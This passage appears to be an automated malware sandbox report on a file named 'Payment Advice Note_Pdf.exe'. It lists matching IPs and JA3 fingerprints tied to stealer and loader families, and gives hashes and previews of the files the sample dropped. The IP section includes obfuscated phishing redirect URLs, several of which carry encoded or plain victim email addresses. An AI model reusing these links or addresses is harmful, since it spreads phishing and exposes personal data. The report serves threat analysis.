	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.1.169
	file.exe	Get hash	malicious	LummaC	Browse	172.67.129.166
HOST4GEEKS-LLCUS	Statement 2024-14.pdf	Get hash	malicious	Unknown	Browse	172.93.120.138
	https://prodetailingcar.es	Get hash	malicious	Unknown	Browse	172.93.120.138
	Order_67593.vbs	Get hash	malicious	GuLoader	Browse	185.221.216.115
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bcu%C2%ADrio%C2%ADsi%C2%ADty%C2%ADh%C2%ADi%C2%ADve.%E2%80%8Bon%C2%ADline%2Fsys%2Fcss%2F36Cg6awhUCmCkqglue0g3yTJ/osman.turhan@hotmail.com	Get hash	malicious	Unknown	Browse	172.93.120.11
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bxn--dic%C2%ADesisdeba%C2%ADrin%C2%ADas%C2%AD-6%C2%ADu%C2%ADb.%E2%80%8Bor%C2%ADg%2Fsys%2Fcss%2FvzEOd74Ux6iYa/YWxldGhpYS5oZXJtb3NpbGxvQHdyaS5vcmc=	Get hash	malicious	Unknown	Browse	172.93.120.11
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%73%6E%61%64%76%69%73%6F%72%2E%63%6F%6D%2F%73%6F%66%74%2FSxc3pETOBH0XkYr2nUnvkLkC/b3RpbmVAZ29hYS5vcmc=	Get hash	malicious	HTMLPhisher	Browse	172.93.120.13
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bn%C2%ADu%C2%ADj%C2%ADo%C2%ADo%C2%ADm.%E2%80%8Ba%C2%ADi%2Fass%2Flol%2Fwtrwlubz6LjwvqYx6RFFRSbU/YmxhbmNoZS5idXJuc0BlbGRlcnMuY29tLmF1	Get hash	malicious	Unknown	Browse	172.93.120.11
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bxn--dic%C2%ADesisdeba%C2%ADrin%C2%ADas%C2%AD-6%C2%ADu%C2%ADb.%E2%80%8Bor%C2%ADg%2Fsys%2Fcss%2FNKMmOnLVtWgIq/Z3lvcmd5LmJvc3pAby1pLmNvbQ==	Get hash	malicious	Unknown	Browse	172.93.120.11
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bn%C2%ADu%C2%ADj%C2%ADo%C2%ADo%C2%ADm.%E2%80%8Ba%C2%ADi%2Fass%2Flol%2FBzJeQbLRms2U4qlkHvvDFza8/YmxhbmNoZS5i	Get hash	malicious	Unknown	Browse	172.93.120.11
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bn%C2%ADu%C2%ADj%C2%ADo%C2%ADo%C2%ADm.%E2%80%8Ba%C2%ADi%2Fass%2Flol%2FXMMW7MOtnsvMJxHlCZqfQT3E/YW1jZWxob25lQHJlbGlhYmxlY29udHJvbHMuY29t	Get hash	malicious	Unknown	Browse	172.93.120.11

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.93.121.126
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.93.121.126
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.93.121.126
	z1Quotation.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.93.121.126
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	172.93.121.126
	Gelato Italiano_74695.exe.exe	Get hash	malicious	Unknown	Browse	172.93.121.126
	Gelato Italiano_74695.exe.exe	Get hash	malicious	Unknown	Browse	172.93.121.126
	Bnnebgers.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	172.93.121.126
	NTS_eTaxInvoice.html.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.93.121.126
	Faktura_82666410_1361590461#U00b7pdf.vbe	Get hash	malicious	Remcos, GuLoader	Browse	172.93.121.126

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll	HSBC_Payment.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Est_US091024A - PICTURE.exe	Get hash	malicious	Azorult, GuLoader	Browse
	SwiftMesaj.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse
	SN890156.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Unincriminated.exe	Get hash	malicious	Azorult, GuLoader	Browse
	PO#940894.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Opgaveforlb.exe	Get hash	malicious	Azorult, GuLoader	Browse
	z1Io2AQrOZ.exe	Get hash	malicious	Azorult	Browse
	Modifications_List.one	Get hash	malicious	AZORult	Browse
	cJX8BV8LYG.exe	Get hash	malicious	Azorult	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll	HSBC_Payment.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Est_US091024A - PICTURE.exe	Get hash	malicious	Azorult, GuLoader	Browse
	SwiftMesaj.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse
	SN890156.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Unincriminated.exe	Get hash	malicious	Azorult, GuLoader	Browse
	PO#940894.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Opgaveforlb.exe	Get hash	malicious	Azorult, GuLoader	Browse
	z1Io2AQrOZ.exe	Get hash	malicious	Azorult	Browse
	Modifications_List.one	Get hash	malicious	AZORult	Browse
	cJX8BV8LYG.exe	Get hash	malicious	Azorult	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\68560319414786744274685.tmp

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.080160932980843
Encrypted:	false
SSDEEP:	192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
MD5:	502263C56F931DF8440D7FD2FA7B7C00
SHA1:	523A3D7C3F4491E67FC710575D8E23314DB2C1A2
SHA-256:	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
SHA-512:	633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: HSBC_Payment.exe, Detection: malicious, Browse Filename: Est_US091024A - PICTURE.exe, Detection: malicious, Browse Filename: SwiftMesaj.pdf.exe, Detection: malicious, Browse Filename: SN890156.exe, Detection: malicious, Browse Filename: Unincriminated.exe, Detection: malicious, Browse Filename: PO#940894.exe, Detection: malicious, Browse Filename: Opgaveforlb.exe, Detection: malicious, Browse Filename: z1Io2AQrOZ.exe, Detection: malicious, Browse Filename: Modifications_List.one, Detection: malicious, Browse Filename: cJX8BV8LYG.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.093995452106596
Encrypted:	false
SSDEEP:	192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
MD5:	CB978304B79EF53962408C611DFB20F5
SHA1:	ECA42F7754FB0017E86D50D507674981F80BC0B9
SHA-256:	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
SHA-512:	369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: HSBC_Payment.exe, Detection: malicious, Browse Filename: Est_US091024A - PICTURE.exe, Detection: malicious, Browse Filename: SwiftMesaj.pdf.exe, Detection: malicious, Browse Filename: SN890156.exe, Detection: malicious, Browse Filename: Unincriminated.exe, Detection: malicious, Browse Filename: PO#940894.exe, Detection: malicious, Browse Filename: Opgaveforlb.exe, Detection: malicious, Browse Filename: z1Io2AQrOZ.exe, Detection: malicious, Browse Filename: Modifications_List.one, Detection: malicious, Browse Filename: cJX8BV8LYG.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1028816880814265
Encrypted:	false
SSDEEP:	384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
MD5:	88FF191FD8648099592ED28EE6C442A5
SHA1:	6A4F818B53606A5602C609EC343974C2103BC9CC
SHA-256:	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
SHA-512:	942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...\|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.126358371711227
Encrypted:	false
SSDEEP:	192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
MD5:	6D778E83F74A4C7FE4C077DC279F6867
SHA1:	F5D9CF848F79A57F690DA9841C209B4837C2E6C3
SHA-256:	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
SHA-512:	02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21816
Entropy (8bit):	7.014255619395433
Encrypted:	false
SSDEEP:	384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
MD5:	94AE25C7A5497CA0BE6882A00644CA64
SHA1:	F7AC28BBC47E46485025A51EEB6C304B70CEE215
SHA-256:	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
SHA-512:	83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d......................g..................U...................M...

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
